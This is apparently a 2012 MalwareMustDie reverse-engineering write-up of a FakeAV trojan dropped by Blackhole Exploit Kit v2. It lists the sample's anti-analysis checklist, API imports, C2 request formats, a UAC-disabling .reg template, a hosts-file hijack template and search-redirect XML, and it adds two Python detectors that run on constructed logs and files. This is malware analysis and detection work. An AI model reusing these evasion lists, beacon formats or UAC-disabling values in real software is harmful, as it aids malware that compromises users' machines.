- =======================================
- #malwareMustDie - BHEK2 (Blackhole Exploit Kit v2) dropped FakeAV Trojan
- Reversing Analysis
- References: https://www.virustotal.com/file/72d25f65ba822eb314a43321546ccf698a4b30e51f37406c27846671543e621f/analysis/
- References: http://blog.dynamoo.com/2012/12/malware-sites-to-block-191212.html
- @unixfreaxjp ~]$ date
- Thu Dec 20 01:26:55 JST 2012
- =============================
- Trojan sent parameter formats:
- HTTP/1.1 GET hxxp://report.aaa.com/?I55520=%96%C7%A5%A2%D7%ABclj%98%D4i%9E%9Ffi%98m%A2gneg%C7%A8%D1%AE%99%97egh%A9%8B%E7%E5%AF%EB%A4%8D%85%5B%E8%9E%C9%A6jkmn%97%A1%A3%9Ck%D5%E4%9A%9B%8A%5B%A2%9B%94%AF%A9%A9%A3%A3%AAfmxf%ACx%9C%AFj%7Bzz%A2nmna%99%A4%9E%82iwwfa%A5%8B%E2%D4%E5%B1_eee%A3g%95%99eeef%A1eee%5E%93%9F%9Do%ABreb%60%A2%95%A1%B4%A7%98"
- Where "report.aaa.com" (a placeholder name) resolves to the IP address written into the hosts file the trojan plants (see the hosts-file section below).
- After copying itself and deleting the original, the trojan's activities, as reversed, are as follows:
- // Registry keys the code is written to search:
- SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform\
- SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform\
- Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\
- // Detecting the analysis software below (anti-analysis / anti-VM / anti-sandbox check)...
- // if any of these is found the trojan will not run properly..
- // by process/file name:
- cv.exe
- irise.exe
- IrisSvc.exe
- wireshark.exe
- dumpcap.exe
- ZxSniffer.exe
- Aircrack-ng Gui.exe
- observer.exe
- tcpdump.exe
- WinDump.exe
- wspass.exe
- Regshot.exe
- ollydbg.exe
- PEBrowseDbg.exe
- windbg.exe
- DrvLoader.exe
- SymRecv.exe
- Syser.exe
- apis32.exe
- VBoxService.exe
- VBoxTray.exe
- SbieSvc.exe
- SbieCtrl.exe
- SandboxieRpcSs.exe
- SandboxieDcomLaunch.exe
- SUPERAntiSpyware.exe
- ERUNT.exe
- ERDNT.exe
- EtherD.exe
- Sniffer.exe
- CamtasiaStudio.exe
- CamRecorder.exe
- Software\CommView
- // registry...
- SYSTEM\CurrentControlSet\Services\IRIS5
- Software\eEye Digital Security
- SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Wireshark
- SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\wireshark.exe
- SOFTWARE\ZxSniffer
- SOFTWARE\Cygwin
- SOFTWARE\Cygwin
- SOFTWARE\B Labs\Bopup Observer
- AppEvents\Schemes\Apps\Bopup Observer
- Software\B Labs\Bopup Observer
- SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Win Sniffer_is1
- Software\Win Sniffer
- SOFTWARE\Classes\PEBrowseDotNETProfiler.DotNETProfiler
- Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs\Debugging Tools for Windows (x86)
- SYSTEM\CurrentControlSet\Services\SDbgMsg
- Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs\APIS32
- Software\Syser Soft
- SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\APIS32
- SOFTWARE\APIS32
- SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Oracle VM VirtualBox Guest Additions
- SYSTEM\CurrentControlSet\Services\VBoxGuest
- SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sandboxie
- SYSTEM\CurrentControlSet\Services\SbieDrv
- Software\Classes\Folder\shell\sandbox
- Software\Classes\*\shell\sandbox
- // Registry keys that these security tools leave behind are checked too:
- SOFTWARE\SUPERAntiSpyware.com
- SOFTWARE\Classes\SUPERAntiSpywareContextMenuExt.SASCon.1
- SOFTWARE\SUPERAntiSpyware.com
- SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ERUNT_is1
- // Using DNSAPI.dll calls
- DnsFlushResolverCache
- // Using orig WS2_32.dll
- WSAWaitForMultipleEvents
- WSACreateEvent
- WSAEventSelect
- WSACloseEvent
- // WININET.dll
- DeleteUrlCacheEntryW
- InternetConnectA
- InternetQueryDataAvailable
- InternetReadFile
- HttpSendRequestW
- HttpOpenRequestA
- HttpAddRequestHeadersA
- InternetOpenA
- InternetCloseHandle
- //iphlpapi.dll
- GetAdaptersInfo
- // KERNEL32.dll
- eTime
- DeleteFileW
- CreateThread
- ExpandEnvironmentStringsW
- CreateFileA
- MoveFileExA
- GetFileAttributesA
- CreateDirectoryA
- SetFileAttributesA
- DeleteFileA
- FindFirstFileW
- GetVolumeInformationA
- GetVersionExW
- FindClose
- DeviceIoControl
- ExpandEnvironmentStringsA
- CopyFileA
- FindFirstFileA
- FindNextFileA
- WaitForSingleObjectEx
- lstrcatW
- GetTempFileNameW
- MoveFileExW
- WriteFile
- ReadFile
- CreateFileW
- GetTempPathW
- GetLocaleInfoA
- GetVolumeInformationW
- HeapAlloc
- HeapFree
- GetProcessHeap
- LocalAlloc
- CreateRemoteThread
- OpenProcess
- VirtualAllocEx
- ProcessIdToSessionId
- LocalFree
- WriteProcessMemory
- InterlockedDecrement
- SetEndOfFile
- GetFileSize
- SetFilePointer
- GetTickCount
- // USER32.dll
- FindWindowA
- DispatchMessageW
- CreateDialogParamW
- ShowWindow
- EndDialog
- ReleaseDC
- MessageBoxA
- IsDialogMessageW
- TranslateMessage
- GetDC
- wsprintfW
- BeginPaint
- SendMessageA
- KillTimer
- PostQuitMessage
- GetMessageW
- SetTimer
- DestroyWindow
- EndPaint
- wsprintfA
- // GDI32.dll
- GetObjectA
- GetObjectW
- CreateCompatibleBitmap
- CreateCompatibleDC
- SelectObject
- DeleteDC
- BitBlt
- // ADVAPI32.dll
- RegSetValueExA
- RegQueryValueExA
- RegEnumKeyExA
- RegOpenKeyExA
- RegQueryInfoKeyA
- GetUserNameA
- RegCloseKey
- RegCreateKeyExW
- AllocateAndInitializeSid
- RegEnumValueW
- FreeSid
- CheckTokenMembership
- RegSetValueExW
- InitializeSecurityDescriptor
- SetSecurityDescriptorDacl
- RegCreateKeyExA
- InitializeAcl
- AddAccessAllowedAce
- RegEnumValueA
- SetFileSecurityA
- CreateServiceW
- CloseServiceHandle
- OpenSCManagerW
- StartServiceW
- RegQueryValueExW
- RegOpenKeyExW
- // SHELL32.dll
- ShellExecuteW
- CommandLineToArgvW
- SHChangeNotify
- // OLEAUT32.dll / ole32.dll (the COM calls below are ole32.dll exports)
- CoUninitialize
- CreateStreamOnHGlobal
- CoInitialize
- CoCreateInstance
- CoInitializeSecurity
- CoInitializeEx
- // ntdll.dll
- NtConnectPort
- NtRequestWaitReplyPort
- RtlNtStatusToDosError
- NtClose
- NtDelayExecution
- NtCreateSection
- NtQuerySystemTime
- // PSAPI.DLL
- EnumProcesses
- GetProcessImageFileNameW
- // urlmon.dll
- URLDownloadToFileW
- // HTTP header names embedded in the C2 code. These are general and response-header names, so they are most likely matched in the server's reply rather than sent by the trojan:
- Cache-Control:
- Connection:
- Date:
- Pragma:
- Transfer-Encoding:
- Upgrade:
- Via:
- Age:
- Location:
- Proxy-Authenticate:
- Public:
- Retry-After:
- Server:
- Vary:
- Warning:
- WWW-Authenticate:
- Content-Length:
- Transfer-Encoding:
- ========================================
- First CNC comm structure (reversed code)
- ========================================
- // The structure of the C2 URL DOWNLOAD....
- update%s.%s.com
- // alphabet for the pseudorandom subdomain generator...
- // + format strings used to assemble the URLs:
- abcdefghijklmnopqrstuvwxyz0123456789
- $%s&%s%s$
- ?%c%c=%s
- // structure of the first download request (starts with the user-agent):
- Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b8pre) Gecko/20101114 Firefox/4.0b8pre
- GET
- Host: %s
- ====================
- second comm
- ===================
- // how the encoded data is sent and the strings that generate it (the alphabet below is the standard Base64 table, so the data= field is Base64-encoded):
- $%s&controller=sign&data=%s&mid=%s$
- ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
- // here we go...
- GET %s?%s HTTP/1.1
- Host: %s
- User-Agent: %s
- // hard-coded communication user-agent (note the .NET CLR tokens):
- Mozilla/4.0 (compatible; MSIE 8.0; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.590; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
- Mozilla/4.0 (compatible; MSIE 8.0; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.590; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
- // sending the infected PC's profile:
- POST %s HTTP/1.1
- Host: %s
- User-Agent: %s
- Content-Length: %d
- Content-Type: application/x-www-form-urlencoded
- // OS version tokens, one of which is sent as the wv= value below:
- wvNT
- wv2k
- wvME
- wvXP
- wv2k3
- wvVista
- wv2k8
- wvUnknown
- // format strings for the machine identifiers and the check-in query (wv = Windows version, uid, lng = likely locale, mid = machine id, res, v):
- %.08X%.08X%.08X%.08X
- %.01d%.03d%.03d%.03d%.02d%.08X
- wv=%s&uid=%d&lng=%s&mid=%s&res=%s&v=%08X
- // likely C2 domain patterns:
- report.*
- *.com
- *.cfgbin
- // requested data
- HTTP/1.1
- GET
- Host: update1.randomstring.com // note this: the host is generated, see the update%s.%s.com format above
- User-Agent: IE7
- /?abbr=RTK&setupType=update&uid=%d&ttl=%s&controller=microinstaller&pid=3
- HTTP/1.1
- HEAD
- Host: update1.randomstring.com
- User-Agent: IE7
- <input type="hidden" name="%[^"]" value="%[^"] ">
- HTTP/1.1
- /update_c1eec.exe
- POST
- Host: update1.randomstring.com
- User-Agent: IE7
- /?abbr=RTK&setupType=update&uid=%d&ttl=%s&controller=microinstaller&pid=3
- HTTP/1.1
- GET
- Host: update1.randomstring.com
- User-Agent: IE7
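- The request structures above give enough fixed material to detect this beacon in proxy or web logs without knowing the subdomain generator. The following is an added example written for this write-up, not code from the original analysis: it keys on the update<rand>.<rand>.com host shape, the bare IE7 User-Agent, the microinstaller download query, the controller=sign check-in and the wv/uid/lng/mid/res/v profile POST. The log format and the hostnames in the sample are constructed; report.aaa.com is the placeholder name used earlier in this paste, and the meaning of res= is not known from the strings.

```python
"""Detection for the FakeAV C2 traffic patterns listed above (added example,
not code from the original analysis). Log format and hosts are constructed."""
import re
from urllib.parse import urlsplit, parse_qs

# "update%s.%s.com" filled from the alphabet abcdefghijklmnopqrstuvwxyz0123456789
UPDATE_HOST = re.compile(r"^update[a-z0-9]+\.[a-z0-9]+\.com$")
REPORT_HOST = re.compile(r"^report\.[a-z0-9.-]+\.com$")
# Windows-version tokens the sample puts in wv=
WV_TOKENS = {"wvNT", "wv2k", "wvME", "wvXP", "wv2k3", "wvVista", "wv2k8", "wvUnknown"}
PROFILE_KEYS = {"wv", "uid", "lng", "mid", "res", "v"}


def classify_request(method, url, user_agent, body=""):
    """Return the list of signature names this request matches (empty if clean)."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    params = parse_qs(parts.query, keep_blank_values=True)
    if method.upper() == "POST" and body:
        # the profile goes form-urlencoded in the body; merge it with the query
        params.update(parse_qs(body, keep_blank_values=True))
    first = lambda k: params.get(k, [""])[0]

    hits = []
    if UPDATE_HOST.match(host):
        hits.append("update-host-generator")
    if REPORT_HOST.match(host):
        hits.append("report-host")
    if user_agent.strip() == "IE7":
        hits.append("ie7-user-agent")
    # /?abbr=RTK&setupType=update&uid=%d&ttl=%s&controller=microinstaller&pid=3
    if first("controller") == "microinstaller" and first("abbr") == "RTK" and first("pid") == "3":
        hits.append("microinstaller-download")
    # $%s&controller=sign&data=%s&mid=%s$
    if first("controller") == "sign" and "data" in params and "mid" in params:
        hits.append("sign-checkin")
    # wv=%s&uid=%d&lng=%s&mid=%s&res=%s&v=%08X  (uid decimal, v eight hex digits)
    if PROFILE_KEYS <= set(params) and first("wv") in WV_TOKENS \
            and first("uid").isdigit() and re.fullmatch(r"[0-9A-Fa-f]{8}", first("v")):
        hits.append("machine-profile-post")
    return hits


def scan_log(text):
    """Parse '|'-separated lines ts|method|url|user-agent[|body]; return alerts as dicts."""
    alerts = []
    for raw in text.splitlines():
        if not raw.strip() or raw.startswith("#"):
            continue
        fields = raw.split("|")
        if len(fields) < 4:
            continue
        ts, method, url, ua = fields[:4]
        body = fields[4] if len(fields) > 4 else ""
        hits = classify_request(method, url, ua, body)
        if hits:
            alerts.append({"ts": ts, "host": urlsplit(url).hostname, "hits": hits})
    return alerts


# Constructed proxy-style log, not captured traffic; hostnames are placeholders.
SAMPLE_LOG = """\
# ts|method|url|user-agent|body
2012-12-20T01:26:55|GET|http://update1k3x.qz8hh.com/?abbr=RTK&setupType=update&uid=12345&ttl=3600&controller=microinstaller&pid=3|IE7
2012-12-20T01:27:02|POST|http://report.aaa.com/|Mozilla/4.0 (compatible; MSIE 8.0; Trident/4.0)|wv=wvXP&uid=12345&lng=en-US&mid=ABCDEF0123456789&res=1&v=0000000B
2012-12-20T01:27:10|GET|http://www.example.com/index.html|Mozilla/5.0
2012-12-20T01:27:15|GET|http://update.microsoft.com/?x=1|Mozilla/5.0
"""

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ts"], alert["host"], ",".join(alert["hits"]))
```

- The host regex on its own is weak (a legitimate updates.example.com would match), so treat it as corroboration and alert on the query signatures or on the bare IE7 User-Agent, which no real browser sends. The update.microsoft.com line in the sample is a deliberate near-miss: the generator always puts random characters between "update" and the first dot.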
- Data Buffer
- Build/13.0
- patch:0
- Version/10.0
- ver:2.0
- update/0
- Mod/0
- Service 1.0
- lib/5.0
- Library1.0
- App/7.0
- compat/0
- feed/7.1.0
- system:3.0
- control/5.0
- Engine/4.0
- runtime 11.0
- layout/2.0
- Build/14.0
- patch:10
- Version/11.0
- ver:3.0
- update/10
- Mod/3.0
- Service 2.0
- lib/6.0
- Library2.0
- App/8.0
- compat/4.1.0
- feed/7.2.0
- system:4.0
- control/6.0
- Engine/5.0
- runtime 12.0
- layout/3.0
- Build/15.0
- patch:20
- Version/12.0
- ver:4.0
- update/20
- Mod/4.0
- Service 3.0
- lib/7.0
- Library3.0
- App/9.0
- compat/4.2.0
- feed/7.3.0
- system:5.0
- control/7.0
- Engine/6.0
- runtime 13.0
- layout/4.0
- AppData
- \Mozilla\Firefox\Profiles\
- \prefs.js
- user_pref ( " general.useragent.extra.%[^"] " , " %[^"] " ) ;
- user_pref("general.useragent.extra.%s", "%s"); // and this: the version-like tokens above are presumably written into the Firefox user-agent through general.useragent.extra.* prefs
- // path where the FakeAV alert binary is stored:
- %appdata%\ScanDisc.exe
- %appdata%
- %s\%X.reg
- %s\mcp.ico
- // Making shortcuts...
- %s\mcp.ico
- shortcut
- shortcut
- My Computer
- .mcp
- // .reg file written and imported (sets EnableLUA and both ConsentPromptBehavior values to 0, i.e. turns UAC off, then stores an "update" value):
- Windows Registry Editor Version 5.00
- [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
- "ConsentPromptBehaviorAdmin"=dword:0
- "ConsentPromptBehaviorUser"=dword:0
- "EnableLUA"=dword:0
- [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows]
- "update"="%s"
- Error opening file
- Size of file: %ld bytes.
- DEFAULT_PCID
- Unknown__
- Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\
- SusClientId
- Unknown__
- Software\Microsoft\Windows NT\CurrentVersion\
- ProductId
- Unknown__
- Unknown__
- // this is nasty: it enumerates the physical drives and reads model/serial numbers from the disk controller, presumably to fingerprint the machine:
- \\.\PhysicalDrive%d
- \\.\PhysicalDrive%d
- \\.\PhysicalDrive%d
- \\.\IDE21201.VXD
- \\.\Scsi%d:
- SCSIDISK
- Drive%dModelNumber
- Drive%dSerialNumber
- Drive%dControllerRevisionNumber
- Drive%dControllerBufferSize
- Drive%dType
- Removable
- Fixed
- Unknown
- WD-W
- IBM-
- MAXTOR
- Maxtor
- WDC
- %02X%02X%02X%02X%02X%02X
- InstallDate
- Software\Microsoft\Windows NT\CurrentVersion
- InstallDate = %X
- // overwrite the hosts file...
- C:\Windows\system32\drivers\etc\hosts
- // hostname and URL strings referenced by the hosts-file code:
- google-analytics
- http://findgala.com/?&uid=%d&q={searchTerms}
- // the new hosts file template follows; the %d.%d.%d.%d at the end
- // is the IP address written into it:
- C:\Windows\system32\drivers\etc\hosts.txt
- # Copyright (c) 1993-2006 Microsoft Corp.
- # This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
- # This file contains the mappings of IP addresses to host names. Each
- # entry should be kept on an individual line. The IP address should
- # be placed in the first column followed by the corresponding host name.
- # The IP address and the host name should be separated by at least one
- # space.
- # Additionally, comments (such as these) may be inserted on individual
- # lines or following the machine name denoted by a '#' symbol.
- # For example:
- # 102.54.94.97 rhino.acme.com # source server
- # 38.25.63.10 x.acme.com # x client host
- 127.0.0.1 localhost
- ::1 localhost
- # Copyright (c) 1993-2006 Microsoft Corp.
- # This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
- # This file contains the mappings of IP addresses to host names. Each
- # entry should be kept on an individual line. The IP address should
- # be placed in the first column followed by the corresponding host name.
- # The IP address and the host name should be separated by at least one
- # space.
- # Additionally, comments (such as these) may be inserted on individual
- # lines or following the machine name denoted by a '#' symbol.
- # For example:
- # 102.54.94.97 rhino.acme.com # source server
- # 38.25.63.10 x.acme.com # x client host
- 127.0.0.1 localhost
- ::1 localhost
- %d.%d.%d.%d
- // Now tampering with the IE search settings (SearchScopes) and the Firefox search plugin (search.xml) to redirect searches to findgala.com:
- \Software\Microsoft\Internet Explorer\SearchScopes
- DefaultScope
- URL
- \searchplugins\
- search.xml
- <ShortName>search</ShortName>
- <SearchPlugin xmlns="http://www.mozilla.org/2006/browser/search/">
- <Description>Search for the best price.</Description>
- <InputEncoding>windows-1251</InputEncoding>
- http://findgala.com/?
- <Url type="text/html" method="GET" template="%s">
- <Image width="16" height="16">data:image/x-icon;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAIAAACQkWg2AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAaRJREFUeNpiVIg5JRURw0A0YAHio943kYV%2B%2Ff33%2BdvvX7%2F%2FMjEx8nKycrGzwKXOiPKzICvdeezLhCV3jp15%2Bfv%2FX0YGhv8MDDxMX2qKTIw0RK10eYD6QYqATvoPBkt3f5K0W9Ew4fjTFz%2F%2Bw8Dm3W8UPeZxqFa%2BevsFyD0twgfVsOfkRxHrtfV9u5BVQ8Crd98%2FffkGYQM1QJ20%2FfSPv79eNxQGYfpSVJADmcvEAHbr7oOX2dj%2FERNKIA2%2F%2F%2Fz%2FxfCDhYVoDUDw5P6vf9%2B5iY0HVmZGQWm%2BN3fff%2Fn2k4eLHS739x%2FDiRs%2Ff%2F%2F5x8HO%2FOHzN3djfqgNjIwMgc6qzLx%2Fpy47j2zY%2Feff06tXhOUucgxeun33AUZGpHh4%2Bvo7t8EyIJqz%2FhpasD59%2B5dNrqdnznZIsEL9ICXCsWuBCwvTv%2FymS5PWPP32ExEALz%2F%2BB5r848cPCJcRaMP9xaYQzofPPzfuvrnj0Jst%2B5%2F8%2Bc4sLPeDkYlRgJc93VPE18NIXkYUmJYQSQMZ%2FP3379uPH7%2F%2F%2FEETBzqJ0WqLGvFpe2LCC4AAAwAyjg7ENzDDWAAAAABJRU5ErkJggg%3D%3D</Image>
- <Param name="q" value="{searchTerms}"/>
- <Param name="uid" value="%d"/>
- </Url>
- </SearchPlugin>
- search
- \prefs.js.bak
- browser.search.selectedEngine
- user_pref("browser.search.selectedEngine", "%s");
- user_pref("browser.search.selectedEngine", "%s");
- http://findgala.com/?&uid=%d&q={searchTerms}
- /chrome/report.html
- www.bing.com
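- The host-side changes above (the hosts file rewrite, the UAC-disabling .reg import and the prefs.js edits) can be checked offline from files pulled off a suspect machine. This is an added example for this write-up, not the sample's code or anything from the original analysis. The three sample inputs are constructed to look like the strings above; the 198.51.100.23 address is a documentation range placeholder, and report.aaa.com is the placeholder name used earlier in this paste.

```python
"""Offline triage of the artifacts this FakeAV leaves on the host: hosts-file
redirects, the UAC-disabling .reg import and Firefox prefs.js edits.
Added example, not code from the original analysis; inputs are constructed."""
import re
from ipaddress import ip_address

# Names the sample's strings reference near the hosts-file and search code
WATCHED_NAMES = ("google-analytics", "bing.com", "findgala.com")


def check_hosts(text):
    """Return (ip, hostname, reason) for hosts entries that do not point at loopback."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments, as the resolver does
        if not line:
            continue
        ip, *names = line.split()
        try:
            addr = ip_address(ip)
        except ValueError:
            findings.append((ip, " ".join(names), "unparseable address"))
            continue
        if addr.is_loopback:                          # 127.0.0.1 / ::1 localhost is normal
            continue
        for name in names:
            reason = "non-loopback redirect"
            if any(w in name.lower() for w in WATCHED_NAMES):
                reason += " of a name the sample references"
            findings.append((ip, name, reason))
    return findings


REG_VALUE = re.compile(r'^"([^"]+)"=(dword:([0-9a-fA-F]+)|"(.*)")\s*$')
UAC_VALUES = ("EnableLUA", "ConsentPromptBehaviorAdmin", "ConsentPromptBehaviorUser")


def check_reg(text):
    """Parse .reg text; return {key\\value: value} for the UAC and "update" values the sample writes."""
    flagged = {}
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = REG_VALUE.match(line)
        if not m or key is None:
            continue
        name, _, dword, string = m.groups()
        if key.lower().endswith(r"policies\system") and name in UAC_VALUES \
                and dword is not None and int(dword, 16) == 0:
            flagged[f"{key}\\{name}"] = 0
        if key.lower() == r"hkey_local_machine\software\microsoft\windows" and name == "update":
            flagged[f"{key}\\{name}"] = (string or "").replace("\\\\", "\\")  # undo .reg escaping
    return flagged


USER_PREF = re.compile(r'user_pref\("([^"]+)",\s*"([^"]*)"\);')


def check_prefs_js(text):
    """Return prefs.js string prefs matching the sample's user-agent and search-engine edits."""
    hits = {}
    for name, value in USER_PREF.findall(text):
        if name.startswith("general.useragent.extra.") or name == "browser.search.selectedEngine":
            hits[name] = value
    return hits


# Constructed samples, not files captured from an infection.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2006 Microsoft Corp.
127.0.0.1 localhost
::1 localhost
198.51.100.23 www.google-analytics.com
198.51.100.23 report.aaa.com
"""
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=dword:0
"ConsentPromptBehaviorUser"=dword:0
"EnableLUA"=dword:0

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows]
"update"="C:\\Users\\victim\\AppData\\Roaming\\ScanDisc.exe"
"""
SAMPLE_PREFS = """\
user_pref("browser.search.selectedEngine", "search");
user_pref("general.useragent.extra.Build", "Build/13.0");
user_pref("network.cookie.cookieBehavior", 0);
"""

if __name__ == "__main__":
    print(check_hosts(SAMPLE_HOSTS))
    print(check_reg(SAMPLE_REG))
    print(check_prefs_js(SAMPLE_PREFS))
```

- Run this against hosts and hosts.txt from drivers\etc, the %X.reg file the sample drops under %appdata%, and both prefs.js and the prefs.js.bak copy the sample keeps; a diff between the two prefs files shows exactly which prefs it changed.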
- // Some uninstall info...
- Software\Microsoft\Windows\CurrentVersion\Uninstall
- SystemComponent
- ParentKeyName
- OperatingSystem
- DisplayName
- // Additional paths where the installed data is saved:
- c:\cgvi5r6i\vgdgfd.72g
- C:\file.exe
- ----
- #MalwareMustDie!!